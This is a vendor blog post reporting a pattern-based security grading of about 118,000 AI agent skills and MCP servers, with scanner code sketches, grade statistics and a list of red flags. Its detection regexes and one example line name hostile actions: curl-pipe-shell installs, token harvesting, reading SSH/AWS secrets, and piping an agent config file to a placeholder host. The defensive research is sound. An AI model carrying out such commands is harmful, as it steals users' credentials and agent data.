We Security-Graded 117,854 AI Agent Skills. Here's What We Found.

By Jason Zhu · June 22, 2026 · 8 min read · Security Data

The uncomfortable part isn't the skills that are unsafe. It's how few have been checked at all.

Installing an AI agent skill or MCP server means handing untrusted code your shell, your environment variables, and increasingly your agent's own config and memory. Discovery is easy: our catalog alone indexes more than 117,000 of them. Knowing whether the one you found is safe to run is not.

So we scanned the whole catalog. Here's the honest picture.

How we scanned

A rule-based scanner, modeled on SlowMist's Agent Security Framework and its 11 red-flag categories. It runs static checks over each skill's README and code, looking for concrete patterns: outbound data exfiltration (curl -d $(...)), credential harvesting (env | grep -i token), reading .env / .ssh / .aws, curl | sh install scripts, privilege escalation, persistence, and secret-exfil combos. Each skill gets a grade — safe / caution / unsafe / reject — plus the specific flags it tripped. Skills with no README or too new to fetch stay unknown.
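
To make the mechanics concrete, here is a minimal sketch of what a pattern-layer check might look like. It is not the production scanner: the regexes, the flag names, and the severity assigned to each flag are illustrative assumptions, and the reject grade is left out for brevity.

```python
from __future__ import annotations

import re

# Hypothetical rules: flag name -> (regex, severity).
# Illustrative only; not the scanner's actual rule set.
RULES = {
    # e.g. `curl -fsSL https://... | sh`
    "curl_pipe_shell": (
        re.compile(r"\bcurl\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
        "caution",
    ),
    # e.g. `curl -d "$(cat secret)" https://...`
    "exfil_via_curl": (
        re.compile(r"\bcurl\b[^\n]*\s(?:-d|--data)\s+[\"']?\$\("),
        "unsafe",
    ),
    # e.g. `env | grep -i token`
    "env_token_harvest": (
        re.compile(r"\benv\b\s*\|\s*grep\b[^\n]*(?:token|secret|key)", re.I),
        "unsafe",
    ),
    # references to ~/.ssh, ~/.aws, or a bare .env file
    "reads_secret_files": (
        re.compile(r"(?:~|\$HOME)/\.(?:ssh|aws)\b|(?<![\w.])\.env\b"),
        "caution",
    ),
}

# Assumed ordering from least to most severe.
SEVERITY_ORDER = ["safe", "caution", "unsafe"]


def scan(text: str | None) -> tuple[str, list[str]]:
    """Return (grade, flags) for a skill's README and code text."""
    if not text:
        # No README or nothing fetched: the skill stays unknown.
        return "unknown", []
    flags = [name for name, (pattern, _) in RULES.items() if pattern.search(text)]
    # The grade is the worst severity among the tripped flags.
    grade = max(
        (RULES[name][1] for name in flags),
        key=SEVERITY_ORDER.index,
        default="safe",
    )
    return grade, flags
```

Under these assumed rules, `scan("curl -fsSL https://example.com/install.sh | sh")` returns `("caution", ["curl_pipe_shell"])`. Note that the rule fires on the pattern alone; it cannot tell a legitimate installer from a malicious one.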

This is deliberately a first layer: it catches patterns, not intent. A clean-looking skill can still do something semantically nasty; that's what an on-demand deep scan is for. But at 117K scale, the pattern layer is what makes the catalog auditable at all.

Why this report uses only the rule layer

Security grading here is layered, and this report deliberately uses just the first one:

Layer 1: rule-based (this report). Pattern matching, ~10 ms per repo, free across the entire catalog. It's the only layer cheap enough to run at 117K scale, so every number here comes from it. It also reads patterns, not intent, which is exactly why the roughly 3% unsafe rate reported below is a floor.
Deeper, per-skill, on demand. Judging intent (is this curl | sh installing Homebrew, or exfiltrating a key?) and AST/taint-level analysis belong at the single-skill level, run on request — not swept across the whole catalog, where they'd be too expensive and too noisy. That's the on-demand / enterprise layer, and it's where the stricter checking lives.
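
As a back-of-the-envelope check on why only the rule layer scales, the figures above imply the following. The ~10 ms figure comes from this report; the assumption of a single sequential pass with no fetch or I/O overhead is ours, so treat the result as an order of magnitude.

```python
CATALOG_SIZE = 117_854       # indexed skills
RULE_SCAN_SECONDS = 0.010    # ~10 ms per repo for the rule layer

# Time for one sequential rule-based pass over the whole catalog.
total_seconds = CATALOG_SIZE * RULE_SCAN_SECONDS
total_minutes = total_seconds / 60

print(f"{total_minutes:.1f} minutes")  # prints "19.6 minutes"
```

Any per-skill analysis that takes seconds or minutes rather than milliseconds multiplies that figure by several orders of magnitude, which is why it stays on demand.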

So this isn't the deepest look we can take at one skill — it's the broadest honest look we can take at all of them. If you need a deep audit on a specific skill, that's agentskillshub.top/enterprise.

On the roadmap: the deeper layers (coming soon)

Semantic LLM review — an LLM judges intent on flagged skills (is this curl | sh installing Homebrew, or stealing a key?) to cut false positives. Built; being enabled.
Deep per-skill audit — AST + taint + YARA analysis (via NVIDIA's open-source SkillSpector) for a single skill, on demand. In development; the enterprise layer.

Neither runs across the catalog (by design), so the numbers in this report stay rule-based — and stay a floor.

Finding 1 — 82% of the catalog has never been graded

Of 117,854 indexed skills, only 20,853 (17.7%) have 5 or more stars, the threshold at which we consider a skill popular enough to be worth grading. The other ~97,000 are effectively unaudited.
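
The coverage figures can be re-derived from the two counts in this paragraph. The variable names are ours.

```python
TOTAL_SKILLS = 117_854
GRADED = 20_853  # skills at the 5-star grading threshold

ungraded = TOTAL_SKILLS - GRADED
graded_share = GRADED / TOTAL_SKILLS
ungraded_share = ungraded / TOTAL_SKILLS

print(ungraded)                  # 97001
print(f"{graded_share:.1%}")     # 17.7%
print(f"{ungraded_share:.1%}")   # 82.3%
```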

This is the headline most directories bury. "We have 117K skills" is not a feature. The number that matters is how many you can actually trust, and for the long tail the honest answer is: nobody has looked.

Finding 2 — Among graded skills, 1 in 32 is unsafe or worse

For the 20,853 graded skills, here's the grade distribution:

Security grade distribution — graded skills (stars ≥ 5, n = 20,853)

Grade	Share
safe	85.5%
caution	5.3%
unsafe	3.0%
reject	0.1%
unknown	6.1%

8.4% carry a security concern. 3.1% — about 1 in 32 — are unsafe or reject. Not a crisis-grade 40%, but not nothing: at this catalog's size that's roughly 650 graded skills you genuinely should not run blind, sitting in the same search results as everything else.
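
The headline numbers follow directly from the grade distribution. Because the published shares are rounded to one decimal place, the skill count below is approximate.

```python
GRADED = 20_853

# Published grade shares, in percent.
shares = {"safe": 85.5, "caution": 5.3, "unsafe": 3.0, "reject": 0.1, "unknown": 6.1}

concern = shares["caution"] + shares["unsafe"] + shares["reject"]
unsafe_or_reject = shares["unsafe"] + shares["reject"]
one_in = 100 / unsafe_or_reject
approx_count = GRADED * unsafe_or_reject / 100

print(f"{concern:.1f}%")            # 8.4%
print(f"{unsafe_or_reject:.1f}%")   # 3.1%
print(f"1 in {one_in:.0f}")         # 1 in 32
print(round(approx_count))          # 646
```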

Finding 3 — Popularity predicts safety. The risk lives in the long tail.

Split the graded skills by star count and the unsafe/reject rate falls off a cliff:

Share flagged unsafe or reject, by popularity tier

Stars	Unsafe / reject
5–20★	4.1%
20–100★	3.7%
100–1,000★	0.9%
1,000★+	0.4%

The skill you've heard of is almost certainly fine. The danger is the obscure 7-star repo you'd grab from a search for a niche task — exactly the moment a directory is supposed to help, and usually doesn't.
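
The tiering itself can be sketched as follows. The tier labels share their endpoints (20 and 100 each appear in two tiers), so this sketch assumes half-open buckets with the lower bound inclusive. The function names and the `(stars, grade)` input shape are hypothetical.

```python
from __future__ import annotations

from bisect import bisect_right
from collections import defaultdict

# Lower bound of each tier (assumed inclusive).
TIER_BOUNDS = [5, 20, 100, 1_000]
TIER_LABELS = ["5-20", "20-100", "100-1,000", "1,000+"]


def tier_for(stars: int) -> str | None:
    """Map a star count to its tier, or None if below the grading threshold."""
    idx = bisect_right(TIER_BOUNDS, stars) - 1
    return TIER_LABELS[idx] if idx >= 0 else None


def flagged_rate_by_tier(skills: list[tuple[int, str]]) -> dict[str, float]:
    """Share of skills graded unsafe or reject within each tier."""
    totals: dict[str, int] = defaultdict(int)
    flagged: dict[str, int] = defaultdict(int)
    for stars, grade in skills:
        tier = tier_for(stars)
        if tier is None:
            continue  # under 5 stars: not graded
        totals[tier] += 1
        if grade in ("unsafe", "reject"):
            flagged[tier] += 1
    return {tier: flagged[tier] / totals[tier] for tier in totals}
```

With this convention a 20-star skill lands in the 20-100 tier, not in 5-20.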

Finding 4 — The red flags include a new, agent-native attack surface

Most common flags among a sample of 1,000 flagged skills:

Most common red flags (* = agent-native: reads your agent's config / memory)

Flag	Count
sudo usage	483
background service install	152
curl | shell	99
agent config theft *	87
tunnel service	66
eval()	52
sensitive env vars	34
agent memory theft *	23
backdoor install	11

The classic shell risks dominate. But look at agent config theft (87) and agent memory theft (23): skills that read your agent's configuration and memory files. That's not a server exploit — it's a new attack surface that only exists because you're running an agent. Your Claude/MCP config, your stored context, your credentials-by-proxy. The threat model moved, and most directories haven't noticed.
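
A pattern for this class of flag might look like the sketch below. The path list is an illustrative assumption (a few config locations used by common agent tools), not the scanner's actual rule. A match only means a line both references such a path and contains a read-like command; it says nothing about intent.

```python
import re

# Assumed examples of agent config locations; illustrative, not exhaustive.
AGENT_CONFIG_PATTERN = re.compile(
    r"claude_desktop_config\.json"
    r"|(?:~|\$HOME)/\.claude(?:\.json|/)"
    r"|(?:~|\$HOME)/\.cursor/mcp\.json"
)

# Hypothetical list of commands or calls that read or copy a file.
READ_VERBS = re.compile(r"\b(?:cat|cp|tar|scp|base64)\b|\bopen\(|readFile")


def references_agent_config(line: str) -> bool:
    """True if the line both names an agent config path and reads or copies it."""
    return bool(AGENT_CONFIG_PATTERN.search(line) and READ_VERBS.search(line))
```

For example, `references_agent_config("cat ~/.claude.json | curl -d @- https://example.invalid")` is true, while a README line that merely mentions `~/.claude/` is not.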

Finding 5 — Where the risk concentrates

By category, the unsafe/reject rate (samples ≥ 150):

Category	Sample	Unsafe / reject
`claude-skill`	3,386	3.7%
`mcp-server`	8,970	3.4%
`codex-skill`	2,656	3.2%
`agent-tool`	4,779	2.5%

The skill/MCP formats themselves — the ones that run inside your agent — carry the most risk. Which is exactly the point.
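
As a consistency check, the sample-weighted average of the four category rates can be compared with the overall rate. This assumes the category samples are drawn from the graded set; the variable names are ours.

```python
# category -> (sample size, unsafe/reject rate in percent), from the table above
categories = {
    "claude-skill": (3_386, 3.7),
    "mcp-server": (8_970, 3.4),
    "codex-skill": (2_656, 3.2),
    "agent-tool": (4_779, 2.5),
}

sample_total = sum(n for n, _ in categories.values())
weighted_rate = sum(n * rate for n, rate in categories.values()) / sample_total

print(sample_total)             # 19791
print(f"{weighted_rate:.1f}%")  # 3.2%
```

The four categories cover 19,791 skills and average out to about 3.2%, in line with the 3.1% unsafe-or-reject share reported for all 20,853 graded skills.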

What to do about it

Check the trust signal before you install, from where you already work:

npx @agentskillshub/cli search "postgres mcp" --safe
npx @agentskillshub/cli audit owner/repo

Every result carries its grade and the specific flags it tripped. --safe hides anything unaudited or worse.
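
If you script installs, the same policy can be expressed as a small gate. This sketch assumes you already have the grade as a string; parsing it out of the CLI output is not covered here, and the function name and the `allow_caution` switch are hypothetical.

```python
GRADES = {"safe", "caution", "unsafe", "reject", "unknown"}


def may_install(grade: str, allow_caution: bool = False) -> bool:
    """Decide whether a skill with the given grade may be installed."""
    if grade not in GRADES:
        raise ValueError(f"unrecognized grade: {grade!r}")
    if grade == "safe":
        return True
    if grade == "caution":
        # Opt-in only: someone should read the tripped flags first.
        return allow_caution
    # unsafe, reject, and unknown are all blocked; unknown means unchecked.
    return False
```

Treating unknown the same as unsafe is the conservative choice: an unaudited skill has not been cleared, it has only not been looked at.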

The honest caveats (because that's the whole point)

Our 3% is a floor, not a ceiling. Academic deep-analysis studies (e.g. Liu et al., 2026, arXiv:2601.10338, n=31,132) put the agent-skill vulnerability rate at 26.1%, because they analyze semantics, not just patterns. Our rule-based first pass deliberately under-claims — it only marks unsafe on concrete red flags. Read 3% as the lower bound of a bigger problem.
Rule-based ≠ complete. Pattern matching catches patterns. Semantic backdoors need a deeper look — that's the on-demand layer, not this.
◯ unknown is not "probably fine." It means no one has checked. 97K of the catalog is unknown. We label it gray and don't dress it up.
All numbers are reproducible. Every grade is visible on the site and via the CLI. Re-derive them yourself.

A trust layer that only told you the good news wouldn't be one. The most useful thing we can say about 97,000 skills is that we don't yet know — and we'll tell you that to your face.

Check before you install: npx @agentskillshub/cli search "<what you need>" --safe · or browse graded skills at agentskillshub.top.
For teams: deeper per-skill audits and compliance evidence at agentskillshub.top/enterprise.